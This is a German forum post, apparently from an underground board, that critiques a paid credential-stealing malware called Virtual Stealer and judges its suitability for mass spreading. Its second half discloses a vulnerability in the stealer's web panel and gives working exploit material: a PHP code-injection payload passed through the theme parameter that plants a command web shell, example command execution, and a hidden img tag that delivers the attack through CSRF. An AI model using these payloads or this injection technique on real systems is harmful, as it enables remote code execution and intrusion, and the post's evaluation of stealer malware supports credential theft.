Vorwort:
Seit gestern wird der Virtual Stealer unter: https://www.toolbase...psc/#entry40128 angeboten. Ich sollte das fertige Web-Panel pentesten, leider kam meine Kritik an der Umsetzung bei @
noTime
nicht gut an, ich wurde ausgeschlossen und das Projekt von einem anderen untersucht.
Es ist mittlerweile einfach nur schade zu sehen wie man immer mehr die bequeme Richtung einschlägt anstatt sich intensiv mit dem Prozess auseinanderzusetzen und ein Produkt abzuliefern das auch seine 15 € wert ist. Wenn jemand diese 15 € zustehen dann dem Entwickler des Panels @Kaase, der zum. das Projekt (Web-Panel) als lehrreiche Erfahrung betrachtet hat, leider aber nicht am Gewinn beteiligt ist.
Mal ein paar Zitate:
- Internet Explorer
- Google Chrome
- Mozilla Firefox
- Opera Browser
- Apple Safari
- some more...
- Microsoft Outlook 2000-2016
- Outlook Express
- Windows Mail/Windows Live Mail
- Mozilla Thunderbird
- IncrediMail
- some more...
Diese hier angepriesenen Features werden komplett von Nirsoft übernommen, hier hat man sich die relevante Arbeit gespart, das Senden der von Nirsoft erstellten Log-Datei, ROT13 verschlüsselt (!) ist programmiertechnisch keine Herausforderung.
Kurzum: Das Projekt mag eventuell für Massenspreading gebrauchbar sein, für ernsthafe Operationen allerdings eignet sich dieses Stück Software in keinstem Fall. Meine Kritik würde ich mir sparen: würde es sich um Freeware handeln!
Zu der Schwachstelle:
Über das Panel können diverse Themes selektiert werden, das config.php File wird dann auf den gewählten Eintrag (über einen GET-Parameter gehandelt) umgeschrieben. Das Ganze wird von einem Snippet in der main.php übernommen:
$text[$thindex] = 'define("THEME", "'.$_GET['theme'].'"); //panel theme' . "\n"; $file = fopen("config.php","w"); fwrite($file, implode("", $text)); fclose($file); redirect("main.php");
Über den Payload:
URI/main.php?theme=");@system($_GET['c']);//
Lässt sich eine einfache Shell implementieren, welche auch ohne aktive Benutzer-Session über:
URI/main.php?c=ls OUTPUT: .. main.php etc.
ausgeführt werden kann. Da sich die aktive RCE nur über Benutzerrechte ausführen lässt, aber auf kein gültiges CSRF-Token geprüft wird, muss der angemeldete Benutzer eine präparierte Seite besuchen die den entsprechenden Request z.B. über:
<img src="URI/main.php?theme=%22%29%3B@system%28%24_GET%5B%27c%27%5D%29%3B%2f%2f" style="display:none;" />
ausführt.